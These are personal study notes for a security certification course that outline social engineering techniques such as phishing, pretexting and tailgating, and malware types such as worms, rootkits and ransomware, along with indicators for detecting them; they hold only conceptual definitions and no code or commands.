Identifying Social Engineering and Malware

# Compare and Contrast Social Engineering Techniques [[Principles of Security]] ## Social Engineering - AKA hacking the human - Purposes of social engineering - Reconnaissance and eliciting information - Intrusion and gaining unauthorized access - MANY possibly scenarios - Persuade a user to run a malicious file - contact a help desk and solicit information - Gain access to premises and install a monitoring device - It is important to remember that social engineering can also be face-to-face interactions ## Social Engineering Principles - Reasons for effectiveness - similar to sales people - influence factors of human nature - Familiarity/liking - Establish trust - make request seem reasonable and natural - Consensus/social proof - Exploit polite behaviors - Establish spoofed testimonials or contacts - Authority and intimidation - Make the target afraid to refuse - exploit lack of knowledge or awareness - Scarcity and urgency - Rush the target into a decision ## Impersonation and Trust - Impersonation - Pretend to be someone else - use the persona or charm or to intimidate - Exploit situations where identity-proofing is difficult - Pretexting - using a scenario with convincing additional detail - Trust - Obtain or spoof data that supports the identity claim - fake credential - evidence to make it believable ## Dumpster Diving and Tailgating - Dumpster diving - Steal documents and media from trash - There will probably be info about the company in there - gain evidence for validity like a company doing work there - Tailgating - Access premises covertly - Follow someone else through a door - Piggy backing - Access premises without authorization, but with the knowledge of an employee - Get someone to hold a door open - "I forgot my badge" - a man trap will prevent this ## Identity Fraud and Invoice Scams - Identity fraud - Impersonation with convincing detail and stolen or spoofed proofs - Identity fraud vs identity theft - Invoice scams - Spoofing supplier details to submit invoices with false account details - Credential theft and misuse - Credential harvesting - should surfing - lunchtime attack ## Phishing, Spear Phishing, Whaling, and Vishing - Trick target into using a malicious resource - Spoof legitimate communications and sites - Phishing -> Communicated thru emails, malicious links, typically related to spam. - pretty much hoping someone will click the link - **Spear Phishing** - Highly targeted/tailored attack - the email will have context relevant to the company/situation - **Whaling** - targeting senior management - **Vishing** - Using a voice channel to attack - unsolicited scam phone calls - **SMiShing - Text messaging phishing ## Spam, Hoaxes, and Prepending - Spam - Unsolicited email - Email address harvesting - Spam over internet messaging (SPIM) - Hoaxes - Delivered as spam or malvertising - Fake A-V to get user to install remote desktop software - Phone-based scams - **Prepending** - Tagging email subject line - Can be used by threat actor as a consensus or urgency techniques - Can be added by mail systems to warn users ## Pharming and Credential Harvesting - Passive techniques have less risk of detection - **Pharming** - Redirection by DNS spoofing - DNS record manipulation/poisoning - Typosquatting - Use cousin domains instead of redirection (close resemblance to real websites, with a fat finger perhaps) - Make phishing messages more convincing - Watering Hole - Target a 3rd party site - for example socializing with employees at a bar - Customer, supplier, hobbies, social media... - Credential harvesting - Attacks focused on obtaining credentials for sale rather then direct intrusion - Attacks focused on obtaining multiple credentials for single company ## Influence Campaigns - Sophisticated threat actors using multiple resources to change opinions on a mass scale - Soft power - Leveraging diplomatic and cultural assets - Hybrid warfare - Use of espionage, disinformation, and hacking - Social Media - use of hacked accounts and bot accounts - Spread rumor and reinforce messaging # Analyze Indicators of Malware-Based Attacks ## Malware Classification - classified by vector or infection method - Viruses and worms - Spread within code without authorization - Trojans - a malicious program concealed within a benign one - Potentially unwanted programs/apps **(PUPs/PAPs)** - pre-installed "bloatware" or installed alongside another app - Not completely concealed, but installation may be covert - also called grayware - Classification by payload ## Computer Viruses - Rely on some sort of host file or media - Non-resident/file infector - memory resident - boot - script/macro - Multipartite - Polymorphic - Doesn't show up on signature virus scanner - changes every time it moves/replicates - Vector for delivery - USB drive, email malicious file/link ![[Pasted image 20230628085221.png]] ## Computer Worms and Fileless Malware - Early computer works - Propagate in memory/over network links - consume bandwidth and crash process - Self replicating - Fileless malware - Exploiting remote execution and memory residence to deliver payloads - May run from an initial script or Trojan - Persistence via the registry - use of shellcode to create backdoors and download additional tools - "living off the land" exploitation of built-in scripting tools - Advanced persistent threat (APT)/advanced volatile threat (AVT)/low observable characteristics (LOC) ## Spyware, Adware, and Keyloggers - tracking cookies - Adware (PUP/grayware) - changes to browser settings - Spyware (malware) - Log all local activity - use of recording devices and screenshots - Redirection - Keylogger - Software and hardware ## Backdoors and Remote Access Trojans - backdoor malware to gain access again (persistent connection, as a vulnerability is typically unstable) - Remote access trojan (RAT) - Bots and botnets - Command & control servers (C2 or C&C) - Backdoors from misconfiguration and unauthorized software ## Rootkits - local administrator vs SYSTEM/root privileges - a rootkit is able to conceal itself from task manager and log files - Replace key system files and utilities - Purge log files - firmware rootkits ## Ransomware, Crypto-malware, and Logic Bombs - Ransomware - Nuisance (lock out user by replacing shell) - Crypto-malware - High impact ransomware (encrypt files) - Cryptomining/cryptojacking - Hijack resources to mine cryptocurrency - Logic bombs ![[Pasted image 20230628090014.png]] ## Malware Indicators - Browser changes or overt ransomeware notification - Anti-virus notifications - Endpoint protection platforms and next-gen A-V - Behavior-based analysis - Sandbox execution - Cuckoo - Resource utilization/consumption - Task manager and top - File system changes - Registry - Temp files ## Process Analysis - Signature-based detection is failing to identify modern APT-style tools - Network and host behavior anomalies drive detection methods - Running process analysis - Process explorer - Logging activity - System monitor - Network activity